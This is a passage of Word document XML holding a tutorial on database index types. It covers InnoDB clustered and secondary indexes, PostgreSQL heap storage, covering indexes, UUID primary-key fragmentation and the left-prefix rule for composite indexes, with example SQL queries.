        <w:t xml:space="preserve">            LevelDB, HBase, InfluxDB, TiKV (distributed OLTP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61345F87" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:pict w14:anchorId="19451CD7">
          <v:rect id="_x0000_i5425" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3141B674" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. Index Types — The Full Taxonomy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41015602" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Clustered vs Non-Clustered Indexes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4D6AB5" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Clustered index:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> The table's rows are physically stored in index key order. The index leaf nodes </w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>are</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> the table data — no separate heap. There can be only one clustered index per table (physical storage can only have one order).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="140395BF" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68947AC1" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>MySQL InnoDB clustered index (always the primary key):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23362B10" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Table: users(id INT PRIMARY KEY, name VARCHAR, email VARCHAR, age INT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701EBC55" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="662BF992" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Physical storage order: rows sorted by id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40123712" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Index B+ Tree leaf nodes contain: id + name + email + age (entire row)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D78FFF" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09BBF70B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Point lookup by id:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B010677" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Traverse B+ Tree to leaf → return row data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4161AFD0" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    I/O: O(log N) — no additional heap access needed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA29B53" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="082D940D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Range scan by id (SELECT * FROM users WHERE id BETWEEN 100 AND 200):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5795627B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Find leaf with id=100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18EFE586" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Scan leaf linked list until id &gt; 200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4644FB2E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    I/O: O(log N + range_pages) — sequential pages in order</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F64E1B6" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C33E054" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Non-primary-key lookup (SELECT * FROM users WHERE email = 'x@y.com'):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D31CEDC" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Must scan the entire clustered index (or use secondary index)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD98751" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Secondary index in InnoDB:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36290D83" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Non-primary-key indexes in InnoDB are </w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>non-clustered</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> and store the primary key value (not the physical row location) as the row pointer. Lookup requires a </w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>double traversal</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF82165" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D26127B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Secondary index on email:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="489FDD03" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Leaf entries: [email_value | primary_key_value]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37EE9E3F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5839AEC7" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>SELECT * FROM users WHERE email = 'alice@example.com':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F2E49B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  1. Traverse secondary index → find primary_key_value for that email</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C38DFC1" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  2. Traverse clustered (primary key) index → find full row</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CECD9F6" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15728D1C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Total: 2 × O(log N) page reads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669C1D5F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Called: "double lookup" or "index lookup + bookmark lookup"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1FBA2E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72362311" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Covering index avoids double lookup:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21EC3166" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  CREATE INDEX ON users(email, name, age)  -- includes all needed columns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2FD105" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  SELECT name, age FROM users WHERE email = 'alice@example.com'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E72AB26" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  → Satisfied entirely from secondary index leaf (has email, name, age)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001C8DE0" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  → No clustered index traversal needed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="627B7F46" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PostgreSQL heap-based storage (non-clustered):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36CE836A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>PostgreSQL stores all tables as heaps — rows are stored in pages in insertion order, not key order. All indexes are non-clustered by default. Index leaf nodes contain:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B943959" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7068DBE1" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Index entry: [key_value | (page_number, tuple_offset)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C82AB2" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  page_number: which 8KB heap page contains this row</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="771AAE20" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  tuple_offset: byte offset within the page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5596FC0F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="1C50B4BA" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Lookup:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F31FEE9" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Traverse index → get (page_number, tuple_offset)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0D2B74" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Fetch heap page[page_number] → read tuple at offset</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4048CFD1" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  I/O: O(log N) index pages + 1 heap page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44595420" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The clustering trade-off:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31FD293E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5823EC4A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Advantage of clustered indexes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752CB8A2" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Range scans on the cluster key: sequential I/O, extremely efficient</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB41251" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Single lookup instead of double lookup for all queries on cluster key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2F83D1" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE0D354" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Disadvantage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B17EE4C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Insert order vs cluster key order: if rows are inserted in non-key order</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001D969B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    (random UUIDs as primary keys), each insert may require modifying a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A27663E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    different leaf node → random write I/O → B-Tree fragmentation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248A1944" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F80528" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>InnoDB recommendation: use monotonically increasing primary keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25EABAB8" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  (AUTO_INCREMENT integers, ULIDs) rather than random UUIDs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3909E548" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Reason: sequential inserts always go to the rightmost leaf node</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BADDD16" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    → minimal page splits → minimal fragmentation → good write performance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68077E57" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0286B849" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>UUID as primary key in InnoDB:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0558727C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Each insert targets a random leaf node (based on UUID value)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2CA7BD" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  That leaf may not be in buffer pool → cache miss → disk read</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252BB9F8" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Page splits occur frequently → fragmentation → wasted space</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198A3228" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Performance degrades with table size (more cache misses as table grows)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B2D633" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Composite (Multi-Column) Indexes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D0446D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>A composite index covers multiple columns: CREATE INDEX ON orders(customer_id, order_date, status).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08DDB5F5" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The left-prefix rule — the most important composite index property:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C9A3FDC" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>A composite index (a, b, c) supports queries filtering on:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0490BC2F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1487"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>a alone</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9001B5" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1487"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>a, b together</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129E6428" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1487"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>a, b, c together</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61751F7B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>But NOT:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6545A06D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1488"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>b alone (a is not filtered)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B286145" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1488"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>c alone</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17286E95" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1488"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>b, c together (a is not filtered)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05270DCB" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4648D90C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Index: (customer_id, order_date, status)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73BB72F4" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="7935F36C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Supported queries:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C86EF2" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  WHERE customer_id = 123                         -- uses first column</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1555055F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  WHERE customer_id = 123 AND order_date &gt; '2024' -- uses first two columns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BBBD9D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  WHERE customer_id = 123 AND order_date = '2024-01-15' AND status = 'shipped'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32662167" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  WHERE customer_id = 123 ORDER BY order_date     -- uses index for sort</w:t>
      </w:r>
    </w:p>
